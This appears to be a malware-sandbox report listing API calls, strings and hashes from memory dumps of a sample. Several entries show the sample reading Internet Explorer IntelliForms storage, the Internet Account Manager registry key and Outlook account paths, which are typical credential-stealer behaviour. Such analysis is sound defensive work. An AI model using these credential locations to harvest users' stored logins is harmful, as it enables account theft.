                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 00279604
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00279793
                                                          • HeapFree.KERNEL32(00000000), ref: 0027979A
                                                            • Part of subcall function 00278FBC: __EH_prolog.LIBCMT ref: 00278FC1
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: Heap$FreeH_prologProcess$Deallocate
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,00000001,?,00000000,00000000,?,?,?,?,?,?,002AED9E,?,00000100,?), ref: 002AF3C5
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,?,00000000,00000000,?,002AED9E,?,00000100,?,00000001,?,00000003,?,00000001), ref: 002AF435
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000003,?,00000000,00000000,?,?,?,?,?,?,00000003,?), ref: 002AF50B
                                                          • __freea.LIBCMT ref: 002AF514
                                                          • __freea.LIBCMT ref: 002AF51F
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$__freea
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,00000000), ref: 002ACE05
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,00000000), ref: 002ACE36
                                                          • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,002ACD9C,00000000,00000000), ref: 002ACE65
                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002ACD9C), ref: 002ACE73
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002ACEA5
                                                            • Part of subcall function 002AC965: GetFileInformationByHandle.KERNEL32(?,?), ref: 002AC979
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: File$Time$Pointer$HandleInformationLocalSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,00000000), ref: 0043CBB5
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,00000000), ref: 0043CBE6
                                                          • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0043CB4C,00000000,00000000), ref: 0043CC15
                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0043CB4C), ref: 0043CC23
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043CC55
                                                            • Part of subcall function 0043C715: GetFileInformationByHandle.KERNEL32(?,?), ref: 0043C729
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: File$Time$Pointer$HandleInformationLocalSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 002D0E31
                                                            • Part of subcall function 002C7C93: HeapFree.KERNEL32(00000000,00000000), ref: 002C7CA9
                                                            • Part of subcall function 002C7C93: GetLastError.KERNEL32(?,?,002D10BB,?,00000000,?,00000002,?,002D135E,?,00000007,?,?,002D175F,?,?), ref: 002C7CBB
                                                          • _free.LIBCMT ref: 002D0E43
                                                          • _free.LIBCMT ref: 002D0E55
                                                          • _free.LIBCMT ref: 002D0E67
                                                          • _free.LIBCMT ref: 002D0E79
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 00460BE1
                                                            • Part of subcall function 00457A43: HeapFree.KERNEL32(00000000,00000000), ref: 00457A59
                                                            • Part of subcall function 00457A43: GetLastError.KERNEL32(?,?,00460E6B,?,00000000,?,00000002,?,0046110E,?,00000007,?,?,0046150F,?,?), ref: 00457A6B
                                                          • _free.LIBCMT ref: 00460BF3
                                                          • _free.LIBCMT ref: 00460C05
                                                          • _free.LIBCMT ref: 00460C17
                                                          • _free.LIBCMT ref: 00460C29
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0028D7BF
                                                            • Part of subcall function 002859A9: __EH_prolog.LIBCMT ref: 002859AE
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog$Deallocate
                                                          • String ID: ; expected $unexpected $while parsing
                                                          • API String ID: 2428181759-3160839188
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00456C2B: GetLastError.KERNEL32(?,00000000,?,00444551,00000000,00000000,?,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456C30
                                                            • Part of subcall function 00456C2B: SetLastError.KERNEL32(00000000,00000006,000000FF,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456CCE
                                                          • _free.LIBCMT ref: 004520D5
                                                          • _free.LIBCMT ref: 00452103
                                                          • _free.LIBCMT ref: 0045214B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _free$ErrorLast
                                                          • String ID: ["E
                                                          • API String ID: 3291180501-1051519868
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 002B2EAF
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 002B2F63
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: @$csm
                                                          • API String ID: 3480331319-2398961668
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlEncodePointer.NTDLL(00000000), ref: 002B37B3
                                                          • CatchIt.LIBVCRUNTIME ref: 002B3899
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: CatchEncodePointer
                                                          • String ID: MOC$RCC
                                                          • API String ID: 1435073870-2084237596
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00277E48
                                                          • ___std_fs_convert_narrow_to_wide@20.LIBCPMT ref: 00277E8D
                                                            • Part of subcall function 002ADC68: MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,00000000,?,?,?,00277E92,?,?,?,00000000,00000000), ref: 002ADC7D
                                                            • Part of subcall function 002ADC68: GetLastError.KERNEL32(?,?,00277E92,?,?,?,00000000,00000000), ref: 002ADC89
                                                          • ___std_fs_convert_narrow_to_wide@20.LIBCPMT ref: 00277EB4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ___std_fs_convert_narrow_to_wide@20$ByteCharErrorH_prologLastMultiWide
                                                          • String ID: JyF
                                                          • API String ID: 3840427001-3809408798
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 002ADB1C: GetModuleHandleW.KERNEL32(00488014,00000000,?,002AE1F4,0048BEAC,0046C914,0046C930,0043D999,00000003,?,00000080,0046A7AD,00488014,?,00000003), ref: 002ADB2C
                                                            • Part of subcall function 002ADB1C: GetProcAddress.KERNEL32(00000000,0046A7AD,?,002AE1F4,0048BEAC,0046C914,0046C930,0043D999,00000003,?,00000080,0046A7AD,00488014,?,00000003), ref: 002ADB3A
                                                          • GetLastError.KERNEL32 ref: 002ADBAE
                                                          • GetFileInformationByHandle.KERNEL32(?,?), ref: 002ADBBE
                                                          • GetLastError.KERNEL32 ref: 002ADBD2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorHandleLast$AddressFileInformationModuleProc
                                                          • String ID: @
                                                          • API String ID: 1948868563-1615503679
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          • m_object != nullptr, xrefs: 004204F7
                                                          • cannot compare iterators of different containers, xrefs: 0042053C
                                                          • G:\rc-build-v1-exe\json.hpp, xrefs: 004204F2
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: G:\rc-build-v1-exe\json.hpp$cannot compare iterators of different containers$m_object != nullptr
                                                          • API String ID: 3519838083-2131441591
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00434293
                                                            • Part of subcall function 00434150: lstrlenW.KERNEL32(00000000), ref: 004341B2
                                                            • Part of subcall function 00434150: lstrcpyW.KERNEL32(00000000,00000000), ref: 004341CA
                                                            • Part of subcall function 00434150: lstrcpyW.KERNEL32(00000000,\Accounts), ref: 004341D6
                                                          • _strlen.LIBCMT ref: 004342A7
                                                            • Part of subcall function 0040DA55: __EH_prolog.LIBCMT ref: 0040DA5A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prologlstrcpy$_strlenlstrlen
                                                          • String ID: OUT$LOOK
                                                          • API String ID: 27009005-2048763347
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • std::system_error::system_error.LIBCPMT ref: 00277DA3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: std::system_error::system_error
                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                          • API String ID: 2416138045-1866435925
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,004705F4,00000000,?,?,002B68C4,?,?,002B688C,00000000,00000000,?), ref: 002B68E4
                                                          • GetProcAddress.KERNEL32(00000000,0047060C,00000000,?,?,002B68C4,?,?,002B688C,00000000,00000000,?), ref: 002B68F7
                                                          • FreeLibrary.KERNEL32(00000000,?,?,002B68C4,?,?,002B688C,00000000,00000000,?), ref: 002B691A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: @
                                                          • API String ID: 4061214504-1615503679
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _strrchr
                                                          • String ID:
                                                          • API String ID: 3213747228-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 002D658E
                                                          • _free.LIBCMT ref: 002D65B7
                                                          • SetEndOfFile.KERNEL32(00000000,002D3D8C,00000000,002CA589,?,?,?,?,?,?,?,002D3D8C,002CA589,00000000), ref: 002D65E9
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,002D3D8C,002CA589,00000000,?,?,?,?,00000000), ref: 002D6605
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free$ErrorFileLast
                                                          • String ID:
                                                          • API String ID: 1547350101-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 0046633E
                                                          • _free.LIBCMT ref: 00466367
                                                          • SetEndOfFile.KERNEL32(00000000,00463B3C,00000000,0045A339,?,?,?,?,?,?,?,00463B3C,0045A339,00000000), ref: 00466399
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00463B3C,0045A339,00000000,?,?,?,?,00000000), ref: 004663B5
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _free$ErrorFileLast
                                                          • String ID:
                                                          • API String ID: 1547350101-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 002A3B53: LoadLibraryA.KERNEL32(?), ref: 002A3B92
                                                            • Part of subcall function 002A3B53: GetProcAddress.KERNEL32(00000000,?), ref: 002A3BCD
                                                            • Part of subcall function 002A3B53: FreeLibrary.KERNEL32(00000000), ref: 002A3C01
                                                            • Part of subcall function 002A3FAD: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 002A3FD2
                                                            • Part of subcall function 002A3FAD: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 002A4063
                                                            • Part of subcall function 002A3FAD: RegCloseKey.ADVAPI32(?), ref: 002A4070
                                                            • Part of subcall function 002A407A: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 002A40A1
                                                            • Part of subcall function 002A407A: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 002A40CC
                                                            • Part of subcall function 002A407A: lstrlenW.KERNEL32(?), ref: 002A40E3
                                                            • Part of subcall function 002A407A: lstrlenW.KERNEL32(?), ref: 002A40F0
                                                            • Part of subcall function 002A407A: lstrcpyW.KERNEL32(00000000,?), ref: 002A4111
                                                            • Part of subcall function 002A407A: lstrcatW.KERNEL32(00000000,0047DE0C), ref: 002A411D
                                                            • Part of subcall function 002A407A: lstrcatW.KERNEL32(00000000,?), ref: 002A412B
                                                            • Part of subcall function 002A407A: lstrcatW.KERNEL32(00000000,?), ref: 002A4137
                                                            • Part of subcall function 002A407A: RegEnumKeyExW.ADVAPI32(?,?,?,000007FF,00000000,00000000,00000000,00000000), ref: 002A4171
                                                            • Part of subcall function 002A407A: RegCloseKey.ADVAPI32(?), ref: 002A4186
                                                            • Part of subcall function 002A497B: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000100,00000100,?,00000000), ref: 002A49C3
                                                            • Part of subcall function 002A497B: RegQueryValueExW.ADVAPI32(00000100,?,00000000,?,00000000,00000000,?,00000000), ref: 002A49E2
                                                            • Part of subcall function 002A497B: RegQueryValueExW.ADVAPI32(00000100,?,00000000,00000000,00000000,00000000,?,00000000), ref: 002A4A1D
                                                            • Part of subcall function 002A497B: RegCloseKey.ADVAPI32(00000100,?,00000000), ref: 002A4A3E
                                                          • lstrlenW.KERNEL32(00000000), ref: 002A4402
                                                          • lstrcpyW.KERNEL32(00000000,00000000), ref: 002A441A
                                                          • lstrcpyW.KERNEL32(00000000,0047E090), ref: 002A4426
                                                            • Part of subcall function 002A3FAD: lstrlenW.KERNEL32(?), ref: 002A3FF8
                                                            • Part of subcall function 002A3FAD: lstrcpyW.KERNEL32(00000000,?), ref: 002A4015
                                                            • Part of subcall function 002A3FAD: lstrcatW.KERNEL32(00000000,0047DE0C), ref: 002A4021
                                                            • Part of subcall function 002A3FAD: lstrcatW.KERNEL32(00000000,?), ref: 002A402F
                                                            • Part of subcall function 002B56E1: _free.LIBCMT ref: 002B56F4
                                                          Strings
                                                          • Software\Microsoft\Internet Account Manager, xrefs: 002A43E8
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: lstrcat$lstrcpylstrlen$CloseEnumOpen$LibraryQueryValue$AddressFreeLoadProc_free
                                                          • String ID: Software\Microsoft\Internet Account Manager
                                                          • API String ID: 527226083-3091610973
                                                          • Opcode ID: 78a14d73dddb44db1bb56b23b62298a767081722b52ad043ac5de44d37292e4b
                                                          • Instruction ID: 897186718b8295fb9c26222876718240be18f448f90fdb67f96d56bba184f889
                                                          • Opcode Fuzzy Hash: 78a14d73dddb44db1bb56b23b62298a767081722b52ad043ac5de44d37292e4b
                                                          • Instruction Fuzzy Hash: 56319E71520208FFD718FBA0CD97EEE73ACEA55348B604499F10612192AFF85F14AE26
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 002C1214: _free.LIBCMT ref: 002C1222
                                                            • Part of subcall function 002CA7DE: WideCharToMultiByte.KERNEL32(?,00000000,002C24AB,00000000,00000000,00000000,00000000,00000000,?,00000000,002C24AB,?,002CD934,?,00000000,00000000), ref: 002CA880
                                                          • GetLastError.KERNEL32 ref: 002CF427
                                                          • __dosmaperr.LIBCMT ref: 002CF42E
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 002CF46D
                                                          • __dosmaperr.LIBCMT ref: 002CF474
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                          • String ID:
                                                          • API String ID: 167067550-0
                                                          • Opcode ID: 7784710d1c769099d17c07dd495e47e3d0c1d95db60d0e20e3d507e8cd2d4b71
                                                          • Instruction ID: 826c13cd9fb37918ffc2c128e6e4f540365862756013ffdfb04875a710b77b8c
                                                          • Opcode Fuzzy Hash: 7784710d1c769099d17c07dd495e47e3d0c1d95db60d0e20e3d507e8cd2d4b71
                                                          • Instruction Fuzzy Hash: DA210671620246BF9B75AF658D81E6BB7AEEF043A4710873CFA19C3140D770DC608BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,?,0046C15C), ref: 002A4A9F
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,?,0046C15C), ref: 002A4ABE
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 002A4AE1
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0047913B,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,0046C15C), ref: 002A4B0D
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$lstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3705784190-0
                                                          • Opcode ID: 8f7554a61649c7f9861242b84d103f9e3e1b15cead943f3b81e6ebb4c6593c23
                                                          • Instruction ID: 095bfa6b95eac4398d943cb20bf48dded8a0b9dedfcbbdf232b6ea72af7facf4
                                                          • Opcode Fuzzy Hash: 8f7554a61649c7f9861242b84d103f9e3e1b15cead943f3b81e6ebb4c6593c23
                                                          • Instruction Fuzzy Hash: A4215E75920105EFEB19AFA4CC0AABABAF9EF45300F14456DF881D6251EAF09D50DA60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlenA.KERNEL32(?,?,766F16D0), ref: 0043484F
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,?,766F16D0), ref: 0043486E
                                                          • lstrcpyA.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,766F16D0), ref: 00434891
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0047913B,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,766F16D0), ref: 004348BD
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$lstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3705784190-0
                                                          • Opcode ID: 8f7554a61649c7f9861242b84d103f9e3e1b15cead943f3b81e6ebb4c6593c23
                                                          • Instruction ID: 079fede5dd8a1393d2bf171b5c0c9ffbabc7043523810679e0d0781d5f2f939d
                                                          • Opcode Fuzzy Hash: 8f7554a61649c7f9861242b84d103f9e3e1b15cead943f3b81e6ebb4c6593c23
                                                          • Instruction Fuzzy Hash: 9C216279904144FFEB19AFA4CC0AABE7BF9EF49300F14446EF881D6290EAB46D40DB15
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetFileAttributesA.KERNEL32 ref: 00289AA3
                                                          • CreateDirectoryA.KERNEL32(?,00000000), ref: 00289AB1
                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00289B34
                                                          • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00289B48
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: AttributesCreateDirectoryFile
                                                          • String ID:
                                                          • API String ID: 3401506121-0
                                                          • Opcode ID: f33c47d20e542b380e00c2b1616ea1288c2929b91129d726bc22baba614b6fb4
                                                          • Instruction ID: a33740f2c36c12fe4b3faab0b7ce070dd99231620b9c282c72c42475edbc4786
                                                          • Opcode Fuzzy Hash: f33c47d20e542b380e00c2b1616ea1288c2929b91129d726bc22baba614b6fb4
                                                          • Instruction Fuzzy Hash: 9611663991531506CF30AA78ACC8BFA7B2C9B92324F1802A6E591931C2DAB04DC58F64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetFileAttributesA.KERNEL32 ref: 00289AA3
                                                          • CreateDirectoryA.KERNEL32(?,00000000), ref: 00289AB1
                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00289B34
                                                          • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00289B48
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: AttributesCreateDirectoryFile
                                                          • String ID:
                                                          • API String ID: 3401506121-0
                                                          • Opcode ID: 07874c2c5db0f0d7649794541f3ae0f3d67c95f63020bece240bfe92d6db95ad
                                                          • Instruction ID: 77b030371122f9b10e15126e9a59c7227bea858ec0ac30d9599f3c4ff67b7e11
                                                          • Opcode Fuzzy Hash: 07874c2c5db0f0d7649794541f3ae0f3d67c95f63020bece240bfe92d6db95ad
                                                          • Instruction Fuzzy Hash: E311893990131907CB30AA78ACC8BFA772C9B92324F1801A6F591931C2DAB04DC58F64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLastError.KERNEL32(?,00000000,?,002B47A1,00000000,00000000,?,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6E80
                                                          • _free.LIBCMT ref: 002C6EDD
                                                          • _free.LIBCMT ref: 002C6F13
                                                          • SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6F1E
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLast_free
                                                          • String ID:
                                                          • API String ID: 2283115069-0
                                                          • Opcode ID: 56d4617065c99d710c47ab60d15a40fed92ae370a49908268d4dcf848c9edfb9
                                                          • Instruction ID: ffef80c9bab27c2e386496f08e5fe234d7ba428388917a8c9583ad6504c1b4bf
                                                          • Opcode Fuzzy Hash: 56d4617065c99d710c47ab60d15a40fed92ae370a49908268d4dcf848c9edfb9
                                                          • Instruction Fuzzy Hash: 0A11C6362342026ADB112BB4ECCDF3B255A8BC0770735073DF524821D2EE768C264B20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 002A8013
                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 002A809E
                                                          • CloseHandle.KERNEL32(?), ref: 002A80A7
                                                          • CloseHandle.KERNEL32(?), ref: 002A80B0
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: CloseHandle$CreateFileModuleNameProcess
                                                          • String ID:
                                                          • API String ID: 2820832629-0
                                                          • Opcode ID: 93049b2ec94249f70398235c3c7f643914566fafc4cb7df908e11e522aee71df
                                                          • Instruction ID: 36bc3636612c64e239f3d4524e66a1e3d12617bd53ec5f28c2794c588c91cc5c
                                                          • Opcode Fuzzy Hash: 93049b2ec94249f70398235c3c7f643914566fafc4cb7df908e11e522aee71df
                                                          • Instruction Fuzzy Hash: 1D218072D1024CBFEB019BA4DC81EEEB77CEF59304F005166F649A1022EAB15A998B25
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLastError.KERNEL32(002AE5FD,002AE5FD,00000002,002BB629,002C8E81,00000000,?,002B09CE,00000002,00000000,?,00488A38,?,00277326,002AE5FD,00000004), ref: 002C6FD7
                                                          • _free.LIBCMT ref: 002C7034
                                                          • _free.LIBCMT ref: 002C706A
                                                          • SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002B09CE,00000002,00000000,?,00488A38,?,00277326,002AE5FD,00000004,00000000,00000000,00000000), ref: 002C7075
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLast_free
                                                          • String ID:
                                                          • API String ID: 2283115069-0
                                                          • Opcode ID: de0d3701084fd28141a2aea1eb4363a550953f279465bd81b3576be3263771e2
                                                          • Instruction ID: 4e4240b3ae10eea8c3be9032ddcd2413437caa906dc13caf9d7fa57d6e438266
                                                          • Opcode Fuzzy Hash: de0d3701084fd28141a2aea1eb4363a550953f279465bd81b3576be3263771e2
                                                          • Instruction Fuzzy Hash: 3D1108362386027AD72167786CC9F3B215B8BC17B5B35073DF528821E1EE728C268F64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID:
                                                          • API String ID: 4218353326-0
                                                          • Opcode ID: c7e06f8c33b4a97e2c567af3d80804fec5ec7ba31e2a5a6f3d57ecdfd1b8fd00
                                                          • Instruction ID: 42674a2b69f0523c63c5ab04b46da5efb3b91db0f6d3c5a089a3bc7ca7990637
                                                          • Opcode Fuzzy Hash: c7e06f8c33b4a97e2c567af3d80804fec5ec7ba31e2a5a6f3d57ecdfd1b8fd00
                                                          • Instruction Fuzzy Hash: 5F01F9325122056FCF21FF58CC819EA7768DFC53903544419FD0897202EB70EE258BB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00020008,?), ref: 004349C4
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004349CB
                                                          • GetUserProfileDirectoryA.USERENV(?,?,00000200), ref: 004349DD
                                                          • CloseHandle.KERNEL32(?), ref: 004349EA
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Process$CloseCurrentDirectoryHandleOpenProfileTokenUser
                                                          • String ID:
                                                          • API String ID: 1246687928-0
                                                          • Opcode ID: 7efd7ff150a9593777827fae617af71caa979b80934f4d148253df16b0b2ac34
